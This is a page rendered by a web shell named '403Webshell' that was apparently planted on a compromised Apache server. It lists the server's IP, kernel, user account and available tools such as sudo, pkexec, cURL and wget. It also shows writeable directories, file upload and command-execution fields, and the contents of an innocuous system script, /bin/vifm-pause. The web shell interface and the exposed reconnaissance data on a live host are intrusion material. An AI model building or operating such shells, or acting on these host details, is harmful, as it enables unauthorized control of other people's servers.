403Webshell
Server IP : 216.92.14.13  /  Your IP : 216.73.216.171
Web Server : Apache
System : Linux vps4089.pairvps.com 5.15.0-190-generic #200-Ubuntu SMP Fri Aug 7 15:06:04 UTC 2026 x86_64
User : rmlac2fmr ( 1040637)
PHP Version : 8.2.32
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /bin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /bin/vifm-pause
#!/bin/sh

old_tty_settings=$(stty -g 2> /dev/null)

# empty input stream
if stty -icanon min 0 time 0 2> /dev/null; then
    while read dummy; do
        : discard input
    done
fi

stty "$old_tty_settings" 2> /dev/null

echo "Press return ..."

# make sure terminal is in a state suitable for requesting input
stty icrnl onlcr isig 2> /dev/null
read dummy

stty "$old_tty_settings" 2> /dev/null

Youez - 2016 - github.com/yon3zu
LinuXploit